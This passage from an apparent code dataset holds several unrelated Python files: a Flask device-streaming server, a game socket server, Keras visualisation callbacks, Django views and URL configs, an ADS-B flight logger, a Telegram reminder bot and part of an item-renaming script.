get_device_id():\n if app.config[\"DATA_SOURCE\"] == \"BLE\":\n return app.config[\"BLE_DEVICE_ID\"]\n if app.config[\"DATA_SOURCE\"] == \"SERIAL\":\n return app.config[\"SERIAL_PORT\"]\n if app.config[\"DATA_SOURCE\"] == \"TCPIP\":\n return app.config[\"TCPIP\"]\n else:\n return app.config[\"TEST_DEVICE\"]\n\n\ndef parse_current_config():\n\n ret = {}\n ret[\"sample_rate\"] = app.config[\"CONFIG_SAMPLE_RATE\"]\n ret[\"column_location\"] = dict()\n ret[\"samples_per_packet\"] = app.config[\"CONFIG_SAMPLES_PER_PACKET\"]\n ret[\"source_samples_per_packet\"] = app.config[\"SOURCE_SAMPLES_PER_PACKET\"]\n ret[\"source\"] = app.config[\"DATA_SOURCE\"]\n ret[\"device_id\"] = get_device_id()\n ret[\"streaming\"] = app.config[\"STREAMING\"]\n ret[\"baud_rate\"] = app.config[\"BAUD_RATE\"]\n ret[\"mode\"] = app.config[\"MODE\"].lower()\n\n if app.config[\"CONFIG_COLUMNS\"]:\n ret[\"column_location\"] = app.config[\"CONFIG_COLUMNS\"]\n else:\n ret[\"column_location\"] = {}\n\n return ret\n\n\ndef get_config():\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/scan\", methods=[\"POST\"])\ndef 
scan():\n form = DeviceScanForm()\n\n print(form.data[\"source\"].upper())\n\n source = get_source(\n app.config,\n device_id=None,\n data_source=form.data[\"source\"].upper(),\n connect=False,\n )\n\n device_id_list = source.list_available_devices()\n\n return Response(json.dumps(device_id_list), mimetype=\"application/json\")\n\n\n@app.route(\"/connect\", methods=[\"GET\"])\ndef connect():\n\n if app.config[\"MODE\"] == \"DATA_CAPTURE\":\n if app.config.get(\"STREAMING_SOURCE\", None) is None:\n app.config[\"STREAMING_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"DATA_CAPTURE\",\n )\n\n app.config.get(\"STREAMING_SOURCE\").send_connect()\n\n app.config[\"STREAMING\"] = True\n\n elif app.config[\"MODE\"] == \"RESULTS\":\n if app.config.get(\"RESULTS_SOURCE\", None) is None:\n app.config[\"RESULTS_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"RESULTS\",\n )\n\n app.config[\"STREAMING\"] = True\n\n app.config[\"RESULTS_SOURCE\"].send_connect()\n\n return get_config()\n\n\n@app.route(\"/config\", methods=[\"GET\", \"POST\"])\ndef config():\n form = DeviceConfigureForm()\n\n if request.method == \"POST\":\n disconnect()\n app.config[\"STREAMING\"] = False\n\n source = get_source(\n app.config,\n data_source=form.data[\"source\"].upper(),\n source_type=\"DATA_CAPTURE\",\n device_id=form.data[\"device_id\"],\n )\n\n print(\"SET CONFIG\")\n source.set_config(app.config)\n\n print(\"SEND CONNECT\")\n source.send_connect()\n app.config[\"STREAMING\"] = True\n\n app.config[\"MODE\"] = \"DATA_CAPTURE\"\n\n cache_config(app.config)\n\n app.config[\"STREAMING_SOURCE\"] = source\n\n print(app.config)\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/config-results\", methods=[\"GET\", \"POST\"])\ndef config_results():\n form = DeviceConfigureForm()\n\n if request.method == \"POST\":\n disconnect()\n app.config[\"STREAMING\"] = False\n\n source = get_source(\n app.config,\n data_source=form.data[\"source\"].upper(),\n device_id=form.data[\"device_id\"],\n source_type=\"RESULTS\",\n )\n\n source.set_config(app.config)\n\n source.send_connect()\n\n app.config[\"STREAMING\"] = True\n\n app.config[\"MODE\"] = \"RESULTS\"\n\n app.config[\"RESULT_SOURCE\"] = source\n\n cache_config(app.config)\n\n return get_config()\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/stream\")\ndef stream():\n\n if app.config.get(\"STREAMING_SOURCE\", None) is None:\n app.config[\"STREAMING_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"DATA_CAPTURE\",\n )\n\n app.config[\"STREAMING\"] = True\n print(\"source was none\")\n\n return Response(\n stream_with_context(app.config[\"STREAMING_SOURCE\"].read_data()),\n mimetype=\"application/octet-stream\",\n )\n\n\n@app.route(\"/results\")\ndef results():\n\n if app.config.get(\"RESULT_SOURCE\", None) is None:\n\n app.config[\"RESULT_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"RESULTS\",\n )\n\n app.config[\"STREAMING\"] = True\n\n return Response(\n stream_with_context(app.config[\"RESULT_SOURCE\"].read_result_data()),\n mimetype=\"application/octet-stream\",\n )\n\n\n@app.route(\"/disconnect\")\ndef disconnect():\n\n source = 
app.config.get(\"STREAMING_SOURCE\", None)\n source_resutlts = app.config.get(\"RESULT_SOURCE\", None)\n\n if source is not None:\n source.disconnect()\n\n del app.config[\"STREAMING_SOURCE\"]\n app.config[\"STREAMING_SOURCE\"] = None\n\n print(\"Disconnected from Streaming Source.\")\n\n if source_resutlts is not None:\n source_resutlts.disconnect()\n\n del app.config[\"RESULT_SOURCE\"]\n app.config[\"RESULT_SOURCE\"] = None\n\n print(\"Disconnected from Result Source.\")\n\n app.config[\"STREAMING\"] = False\n\n return get_config()\n\n\nif __name__ == \"__main__\":\n import os\n\n HOST = os.environ.get(\"SERVER_HOST\", \"localhost\")\n try:\n PORT = int(os.environ.get(\"SERVER_PORT\", \"5555\"))\n except ValueError:\n PORT = 5555\n\n if os.path.exists(\"./.config.cache\"):\n app.config.update(json.load(open(\"./.config.cache\", \"r\")))\n\n app.run(HOST, 5555 , debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483636565","text":"import socket\nfrom Position import Position\nfrom State import State\nfrom Handle import handle\n\ndef Init(name):\n\tmsg = \"\"\n\tmsg += \"Name:\" + name\n\tmsg += \";Board:\"\n\tboard = \"5,\"*21 + (\"5,\" + \"0,\"*19 + \"5,\")*19 + \"5,\"*20 + \"5\"\n\tmsg += board\n\tmsg += \";Turn:Black\"\n\treturn msg\n\t\n\n\n\n\n\nSIZE = 1024\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#sock.bind(('192.168.1.2', 8001)) \nsock.bind(('localhost', 8001)) \nsock.listen(5)\n\nconnection1, address1 = sock.accept()\nstate_msg = Init(\"Black\")\nconnection1.send(state_msg)\n\nstate = State(state_msg)\n\nconnection2, address2 = sock.accept()\nstate_msg = Init(\"White\")\nconnection2.send(state_msg)\n\n\nwhile True:\n\n\tif state.Turn == \"Black\":\n\t\tconnect = connection1\n\telse:\n\t\tconnect = connection2\n\n\tpos_msg_id = connect.recv(SIZE)\n\tid, pos_msg = pos_msg_id.split(\";\")\n\n\tpos = Position(pos_msg, state.Turn)\n\t\n\tstate = handle(state.Board, pos)\n\n\tconnection1.send(state.to_str())\n\tconnection2.send(state.to_str())\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293735047","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 10:46:03 2018\n\n@author: jakob\n\"\"\"\nfrom keras.callbacks import Callback, TensorBoard, LambdaCallback\nfrom vis_utils import to_tensor, load_2d\nfrom keras import models\nimport math\nimport numpy as np\nimport imageio\nimport matplotlib.pylab as plt\nimport keras.backend.tensorflow_backend as Ki\n\nclass CustomCallback(Callback):\n \n class activationHistory(Callback):\n def __init__(self, shape, img_path='OASIS/Test/predict/anormal.png'):\n self.batch_activations_model = []\n img = load_2d(img_path, (shape))\n self.img_tensor = to_tensor(img) \n def on_batch_end(self, batch, logs={}):\n with Ki.tf.device('/cpu:0'):\n lays=len(self.model.layers)\n #getting layer outputs, init new model\n layer_outputs = [layer.output for layer in self.model.layers[:lays]]\n activation_model = models.Model(inputs=self.model.input, outputs=layer_outputs)\n #with Ki.tf.device('/cpu:2'): \n activations = activation_model.predict(self.img_tensor) \n self.batch_activations_model.append(activations)\n #self.batch_activations_model.append(self.model.get_weights())\n return\n def get_stack(self):\n return 
self.batch_activations_model\n \n def tensorCall():\n return TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, \n write_images=True)\n def weightsCall():\n \n def get_weights(epoch,logs):\n print(\"end of epoch: \" + str(epoch)) #for instance\n \n return LambdaCallback(on_epoch_end=get_weights)\n \ndef make_gif(stack, layer_to_vis=0):\n \n \n print('start model_acti_gif')\n \n writer = imageio.get_writer('normlayer.gif', mode='I', loop=1)\n shape = stack[0][layer_to_vis].shape[-2]\n features = stack[0][layer_to_vis].shape[-1]\n m = math.ceil(math.sqrt(features))\n grid = np.zeros((shape*m,shape*m))\n #grid = np.full((shape*m,shape*m),255)\n l = len(stack)\n \n for i in range(len(stack)):\n \n activations = stack[i]\n activations = activations[layer_to_vis]\n \n f=0 \n for c in range(m):\n for r in range(m):\n x=c*shape\n y=r*shape\n if f < features:\n acti = proc(activations[0, : ,: ,f])\n grid[x:x+shape, y:y+shape] = acti\n print('\\r[%i/%i] %i - %i - %i' % (i,l,f,r,c), end='')\n f += 1\n \n grid = grid.astype('uint8')\n writer.append_data(grid)\n\n writer.close()\n \ndef proc(activations):\n \n channel_image = activations\n channel_image -= channel_image.mean()\n channel_image /= channel_image.std()\n channel_image *= 64\n channel_image += 128\n channel_image = np.clip(channel_image, 0, 255).astype('uint8')\n return channel_image\n\ndef plot_history(history):\n \n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n ","sub_path":"model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354385842","text":"from django.conf.urls import url\nimport MainApp.views as v\n\n\nurlpatterns = [\n\n # users\n url(r'^login', v.login_user),\n url(r'^logout', v.logout_user),\n url(r'^register', v.register_user),\n\n # customers\n url(r'^register-customer', v.register_customer),\n url(r'^customers', v.give_customers),\n\n\n # projects\n url(r'^create-project', v.create_project),\n url(r'^projects', v.give_projects),\n url(r'^project/(?P\\d*)', v.get_project),\n url(r'^update-project/(?P\\d*)', v.update_project),\n\n\n # task\n url(r'^create-task', v.create_task),\n url(r'^tasks', v.give_tasks),\n url(r'^task/(?P\\d*)', v.get_task),\n url(r'^update-task/(?P\\d*)', v.update_task),\n\n\n # task entries\n url(r'^create-entry', v.create_task_entry),\n url(r'^entries', v.give_entries),\n url(r'^entry/(?P\\d*)', v.get_entry),\n url(r'^update-entry/(?P\\d*)', v.update_entry),\n\n url(r'^start-entry/(?P\\d*)', v.start_task_entry),\n\n url(r'^handle-entry/(?P\\d*)', v.operate_task_entry),\n\n\n # other operations\n url(r'^', v.index),\n\n]\n","sub_path":"project/MainApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511736560","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\n\nfrom demo1.forms import MyForm\nfrom demo1.models import Truth\n# Create your views 
here.\ndef demo1(request):\n\tpass\ndef form(request):\n\t# echo the submitted fields when present, otherwise show the empty form\n\tif request.method == 'GET' and request.GET:\n\t\tname = request.GET['name']\n\t\temail = request.GET['email']\n\t\tmobile = request.GET['mob']\n\t\tsalary = request.GET['sal']\n\t\tdata = [name,email,mobile,salary]\n\t\treturn HttpResponse(data)\n\treturn render(request,'form.html')\ndef adddata(request):\n\tif request.method == 'GET':\n\t\tform = MyForm(request.GET)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/getdata/')\n\t\telse:\n\t\t\tform = MyForm()\n\treturn render(request,'form.html',{'form':form})\n\ndef getdata(request):\n\tdata = Truth.objects.all()\n\treturn render(request,'show.html',{'data':data})\n\ndef delete(request,id):\n\t#return HttpResponse(id)\n\tdata = Truth.objects.get(id=id)\n\tdata.delete()\n\treturn redirect('/getdata/')\n\ndef getdataforedit(request,id):\n\tdata = Truth.objects.get(id=id)\n\treturn render(request,'editdata.html',{'data':data})\n\ndef update(request,id):\n\tif request.method==\"GET\":\n\t\temp = Truth.objects.get(id=id)\n\t\tform = MyForm(request.GET,instance=emp)\n\t\tif form.is_valid():\n\t\t\ttry:\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('/getdata')\n\t\t\texcept:\n\t\t\t\tpass\n\t\telse:\n\t\t\tform = MyForm()\n\t\treturn render(request,\"editdata.html\",{'form':form})\n\n\n\n\n\t\t\n\n\n\n","sub_path":"demo1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239299328","text":"from scipy import io\nimport numpy as np\nimport time\nimport torch\nfrom torch.nn import Upsample\nfrom bicubic import BicubicUp, BicubicDown\n\n\ndef compare_matlab(scale=2):\n mat = io.loadmat(\"bicubic.mat\")\n # d->data, d2->down sample by factor 'scale' ...\n d, d_scale = mat['d'], mat['d{}'.format(scale)]\n # u->data, u2->up sample by factor 'scale' ...\n u, u_scale = mat['u'], mat['u{}'.format(scale)]\n d = torch.tensor(d).unsqueeze(0).unsqueeze(0)\n u = torch.tensor(u).unsqueeze(0).unsqueeze(0)\n\n m_up = BicubicUp(scale, channel=1)\n out_u = m_up(u)\n out_u = out_u[0, 0].numpy()\n err_u = np.sum((out_u - u_scale) ** 2)\n print(\"Error of up sample scale {}:\\t{:.3f}\".format(scale, err_u))\n\n m_down = BicubicDown(scale, channel=1)\n out_d = m_down(d)\n out_d = out_d[0, 0].numpy()\n err_d = np.sum((out_d - d_scale) ** 2)\n print(\"Error of down sample scale {}:\\t{:.3f}\\n\".format(scale, err_d))\n\n\ndef compare_speed(cuda=False):\n x = torch.rand(64, 3, 256, 256)\n m_lazy = BicubicUp(2, channel=3, cuda=cuda)\n m_official = Upsample(scale_factor=2, mode='bicubic', align_corners=False)\n if cuda:\n x = x.cuda()\n m_official.cuda()\n\n t = time.time()\n for i in range(10):\n y = m_lazy(x)\n print(\"lazy implementation on {}:\\t{:.4f}s\".format(\"GPU\" if cuda else \"CPU\", time.time()-t))\n\n t = time.time()\n for i in range(10):\n y = m_official(x)\n print(\"official implementation on {}:\\t{:.4f}s\\n\".format(\"GPU\" if cuda else \"CPU\", time.time() - t))\n\n\nif __name__ == '__main__':\n # whether the output is same as matlab's\n compare_matlab(2)\n compare_matlab(3)\n compare_matlab(4)\n\n if torch.__version__ >= \"1.1.0\":\n # compare the speed of up sample with official implementation\n compare_speed(False)\n if torch.cuda.is_available():\n 
compare_speed(True)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381480383","text":"#!/usr/bin/python\n\n#================================================================================#\n# ADS-B FEEDER PORTAL #\n# ------------------------------------------------------------------------------ #\n# Copyright and Licensing Information: #\n# #\n# The MIT License (MIT) #\n# #\n# Copyright (c) 2015-2016 Joseph A. Prochazka #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy #\n# of this software and associated documentation files (the \"Software\"), to deal #\n# in the Software without restriction, including without limitation the rights #\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #\n# copies of the Software, and to permit persons to whom the Software is #\n# furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in all #\n# copies or substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #\n# SOFTWARE. #\n#================================================================================#\n\n# WHAT THIS DOES:\n# ---------------------------------------------------------------\n#\n# 1) Read aircraft.json generated by dump1090-mutability.\n# 2) Add the flight to the database if it does not already exist.\n# 3) Update the last time the flight was seen.\n\nimport datetime\nimport json\nimport time\nimport os\n#urllib2 is deprecated in python3\ntry:\n # For Python 3.0 and later\n from urllib.request import urlopen\nexcept ImportError:\n # Fall back to Python 2's urllib2\n from urllib2 import urlopen\n\ndef log(string):\n #print(string) # uncomment to enable debug logging\n return\n\n# Read the configuration file.\nwith open(os.path.dirname(os.path.realpath(__file__)) + '/config.json') as config_file:\n config = json.load(config_file)\n\n# Import the needed database library.\nif config[\"database\"][\"type\"] == \"mysql\":\n import MySQLdb\nelse:\n import sqlite3\n\nclass FlightsProcessor(object):\n def __init__(self, config):\n self.config = config\n self.dbType = config[\"database\"][\"type\"]\n # List of required keys for position data entries\n self.position_keys = ('lat', 'lon', 'altitude', 'speed', 'track', 'vert_rate', 'hex')\n\n def setupDBStatements(self, formatSymbol):\n if hasattr(self, 'STMTS'):\n return\n mapping = { \"s\": formatSymbol }\n self.STMTS = {\n 'select_aircraft_count':\"SELECT COUNT(*) FROM adsb_aircraft WHERE icao = %(s)s\" % mapping,\n 'select_aircraft_id': \"SELECT id FROM adsb_aircraft WHERE icao = %(s)s\" % mapping,\n 'select_flight_count': \"SELECT COUNT(*) FROM adsb_flights WHERE flight = %(s)s\" % mapping,\n 'select_flight_id': \"SELECT id FROM adsb_flights WHERE flight = %(s)s\" % mapping,\n 'select_position': \"SELECT message FROM adsb_positions WHERE flight = %(s)s AND message = %(s)s ORDER BY time DESC 
LIMIT 1\" % mapping,\n 'insert_aircraft': \"INSERT INTO adsb_aircraft (icao, firstSeen, lastSeen) VALUES (%(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_flight': \"INSERT INTO adsb_flights (aircraft, flight, firstSeen, lastSeen) VALUES (%(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_position_sqwk': \"INSERT INTO adsb_positions (flight, time, message, squawk, latitude, longitude, track, altitude, verticleRate, speed, aircraft) VALUES (%(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_position': \"INSERT INTO adsb_positions (flight, time, message, latitude, longitude, track, altitude, verticleRate, speed, aircraft) VALUES (%(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'update_aircraft_seen': \"UPDATE adsb_aircraft SET lastSeen = %(s)s WHERE icao = %(s)s\" % mapping,\n 'update_flight_seen': \"UPDATE adsb_flights SET aircraft = %(s)s, lastSeen = %(s)s WHERE flight = %(s)s\" % mapping\n }\n\n def connectDB(self):\n if self.dbType == \"sqlite\": ## Connect to a SQLite database.\n self.setupDBStatements(\"?\")\n return sqlite3.connect(self.config[\"database\"][\"db\"])\n else: ## Connect to a MySQL database.\n self.setupDBStatements(\"%s\")\n return MySQLdb.connect(host=self.config[\"database\"][\"host\"],\n user=self.config[\"database\"][\"user\"],\n passwd=self.config[\"database\"][\"passwd\"],\n db=self.config[\"database\"][\"db\"])\n\n def processAircraftList(self, aircraftList):\n db = self.connectDB()\n # Get Database cursor handle\n self.cursor = db.cursor()\n # Assign the time to a variable.\n self.time_now = datetime.datetime.utcnow().strftime(\"%Y/%m/%d %H:%M:%S\")\n\n for aircraft in aircraftList:\n self.processAircraft(aircraft)\n\n # Close the database connection.\n db.commit()\n db.close()\n\n def processAircraft(self, aircraft):\n hexcode = aircraft[\"hex\"]\n # Check if this aircraft was already seen.\n self.cursor.execute(self.STMTS['select_aircraft_count'], (hexcode,))\n row_count = self.cursor.fetchone()\n if row_count[0] == 0:\n # Insert the new aircraft.\n log(\"Added Aircraft: \" + hexcode)\n self.cursor.execute(self.STMTS['insert_aircraft'], (hexcode, self.time_now, self.time_now,))\n else:\n # Update the existing aircraft.\n self.cursor.execute(self.STMTS['update_aircraft_seen'], (self.time_now, hexcode,))\n log(\"Updating Aircraft: \" + hexcode)\n # Get the ID of this aircraft.\n self.cursor.execute(self.STMTS['select_aircraft_id'], (hexcode,))\n row = self.cursor.fetchone()\n aircraft_id = row[0]\n log(\"\\tFound Aircraft ID: \" + str(aircraft_id))\n\n # Check that a flight is tied to this track.\n if aircraft.has_key('flight'):\n self.processFlight(aircraft_id, aircraft)\n\n def processFlight(self, aircraft_id, aircraft):\n flight = aircraft[\"flight\"].strip()\n # Check to see if the flight already exists in the database.\n self.cursor.execute(self.STMTS['select_flight_count'], (flight,))\n row_count = self.cursor.fetchone()\n if row_count[0] == 0:\n # If the flight does not exist in the database add it.\n params = (aircraft_id, flight, self.time_now, self.time_now,)\n self.cursor.execute(self.STMTS['insert_flight'], params)\n log(\"\\t\\tAdded Flight: \" + flight)\n else:\n # If it already exists pdate the time it was last seen.\n params = (aircraft_id, self.time_now, flight,)\n self.cursor.execute(self.STMTS['update_flight_seen'], params)\n log(\"\\t\\tUpdated Flight: \" + flight)\n # Get the ID of this flight.\n self.cursor.execute(self.STMTS['select_flight_id'], (flight,))\n 
row = self.cursor.fetchone()\n flight_id = row[0]\n\n # Check if position data is available.\n if (all (k in aircraft for k in self.position_keys) and aircraft[\"altitude\"] != \"ground\"):\n self.processPositions(flight_id, aircraft)\n\n def processPositions(self, flight_id, aircraft):\n # Get the ID of this aircraft.\n hexcode = aircraft[\"hex\"]\n self.cursor.execute(self.STMTS['select_aircraft_id'], (hexcode,))\n row = self.cursor.fetchone()\n aircraft_id = row[0]\n\n # Check that this message has not already been added to the database.\n params = (flight_id, aircraft[\"messages\"],)\n self.cursor.execute(self.STMTS['select_position'], params)\n row = self.cursor.fetchone()\n\n if row == None or row[0] != aircraft[\"messages\"]:\n # Add this position to the database.\n if aircraft.has_key('squawk'):\n params = (flight_id, self.time_now, aircraft[\"messages\"], aircraft[\"squawk\"],\n aircraft[\"lat\"], aircraft[\"lon\"], aircraft[\"track\"],\n aircraft[\"altitude\"], aircraft[\"vert_rate\"], aircraft[\"speed\"], aircraft_id,)\n self.cursor.execute(self.STMTS['insert_position_sqwk'], params)\n log(\"\\t\\t\\tInserted position w/ Squawk \" + repr(params))\n else:\n params = (flight_id, self.time_now, aircraft[\"messages\"], aircraft[\"lat\"], aircraft[\"lon\"],\n aircraft[\"track\"], aircraft[\"altitude\"], aircraft[\"vert_rate\"], aircraft[\"speed\"], aircraft_id,)\n self.cursor.execute(self.STMTS['insert_position'], params)\n log(\"\\t\\t\\tInserted position w/o Squawk \" + repr(params))\n else:\n log(\"\\t\\t\\tMessage is the same\")\n\n\nif __name__ == \"__main__\":\n processor = FlightsProcessor(config)\n\n # Main run loop\n while True:\n # Read dump1090-mutability's aircraft.json.\n #with open('/run/dump1090-mutability/aircraft.json') as data_file:\n # data = json.load(data_file)\n\n # Switch from physical file location to using urlopen after the addition of the dump1090-fa option.\n # dump1090-fa and dump1090-mutability store aircraft.json in difrent locations.\n # However Lighttpd is set up to serve this file using the same URL no matter which version is installed.\n response = urlopen('http://localhost/dump1090/data/aircraft.json')\n data = json.load(response)\n\n processor.processAircraftList(data[\"aircraft\"])\n\n log(\"Last Run: \" + datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"))\n time.sleep(15)\n\n","sub_path":"build/portal/python/flights.mutability.py","file_name":"flights.mutability.py","file_ext":"py","file_size_in_byte":10809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142809484","text":"\"\"\"banco URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . 
from . import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n path('administrador/login/', views.login, name='admistrador_login'),\n path('administrador/cliente/', views.lista_cliente, name='admistrador_cliente'),\n path('administrador/cliente/agregar/', views.agregar_cliente, name='admistrador_agregar_cliente'),\n path('administrador/empresa/', views.lista_empresa, name='admistrador_empresa'),\n path('administrador/empresa/agregar/', views.agregar_empresa, name='admistrador_agregar_empresa'),\n path('administrador/cuenta/', views.lista_cuenta, name='admistrador_cuenta'),\n path('administrador/cuenta/agregar/', views.agregar_cuenta, name='admistrador_agregar_cuenta'),\n path('administrador/cuenta/deposito/', views.deposito, name='admistrador_deposito_cuenta'),\n path('administrador/chequera/', views.agregar_chequera, name='admistrador_agregar_chequera'),\n path('administrador/usuario/activar', views.activar_usuario, name='admistrador_activar_usuario'),\n path('administrador/usuario/', views.lista_usuarios, name='admistrador_usuario'),\n path('administrador/cheque/', views.cobrar_cheque, name='admistrador_cobro_cheque'),\n path('administrador/prestamo/', views.aceptar_prestamo, name='admistrador_aceptar_prestamo'),\n path('administrador/tarjeta/agregar', views.agregar_tarjeta, name='admistrador_agregar_tarjeta'),\n]\n","sub_path":"app/administrador/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"601208582","text":"from django.urls import path\nfrom . import views\n\napp_name = 'accounts'\n# changed url from profile-create to profile\nurlpatterns = [\n path('login/', views.LoginView.as_view(), name=\"login\"),\n path('signup/', views.SignUpView.as_view(), name='signup'),\n # path('/profile-detail/', views.ProfileDetailView.as_view(), name='profile-detail'),\n path('profile-detail/', views.profile_detail, name='profile-detail'),\n path('profile/', views.ProfileCreateView.as_view(), name='profile-create'),\n path('user/comments/', views.UserCommentDetailView.as_view(), name='user_comment_list')\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245856324","text":"import telebot\nimport datetime\nimport random\nimport schedule\nimport time\n\nbot = telebot.TeleBot() # NOTE: TeleBot normally requires a bot token string; it appears to have been stripped from this source\n\ntype_clean = ['Уборка кухни', 'Уборка комнат', 'Уборка всей квартиры'] # 'kitchen cleaning', 'room cleaning', 'whole-apartment cleaning'\n\nair_control = 'Проветрить квартиру' # 'air out the apartment'\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n bot.reply_to(message, 'Ну привет') # 'Well, hi'\n chat_id = message.chat.id\n save_chat_id(chat_id)\n send_text(chat_id)\n bot.stop_polling()\n\n\ndef CalculateTypeClean():\n chance = random.randint(0, 100)\n if chance <= 45:\n return type_clean[0]\n elif chance <= 80:\n return type_clean[1]\n elif chance > 80:\n return type_clean[2]\n\n\ndef send_text(chat_id):\n bot.send_message(chat_id, CalculateTypeClean())\n\n\ndef save_chat_id(chat_id):\n file = open('chatid.txt', 'w')\n file.write(str(chat_id))\n file.close()\n\n\ndef load_chat_id():\n file = open('chatid.txt', 'r')\n chat_id = file.read()\n file.close()\n return chat_id\n\ndef main():\n chat_id = load_chat_id()\n if not chat_id:\n bot.polling()\n else:\n send_text(chat_id)\n\n
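# The 'schedule' and 'time' imports above are unused; a daily reminder loop was perhaps planned.\n# A hypothetical sketch of how the schedule library could drive it (not part of the original):\n# schedule.every().day.at('10:00').do(lambda: send_text(load_chat_id()))\n# while True:\n# schedule.run_pending()\n# time.sleep(60)\n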
main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47241801","text":"#!/usr/bin/env python\n'''\n File name: rename_item_db_names.py\n Date created: February 2, 2017\n Python version: 3.6.1\n Version: 1.0.0\n Purpose:\n Rename the item names from an item_db\n and standardize their forms together.\n Author: Phuc H Duong\n Original Repo: https://github.com/phuchduong/essencero_restoration\n Website: phuchduong.io\n Linkedin: https://www.linkedin.com/in/phuchduong/\n'''\nfrom os import path, makedirs\nimport re # regular expression\nimport subprocess as sp # to open files in a text editor as a subprocess\n\n\n# script goes here\ndef main():\n debug_mode = True\n # Repo folder\n if path.isdir(\"C:/repos\"):\n repo_dir = \"C:/repos\"\n elif path.isdir(\"D:/repos\"):\n repo_dir = \"D:/repos\"\n else:\n repo_dir = \"\" # change this to your own directory\n\n # Repos\n server_repo = \"/essencera/\"\n\n # Input data files\n item_db_in_dir = repo_dir + server_repo + \"/db/import-tmpl/item_db.txt\"\n\n # Builds an output folder if it doesn't exist within the same directory\n # as the executed 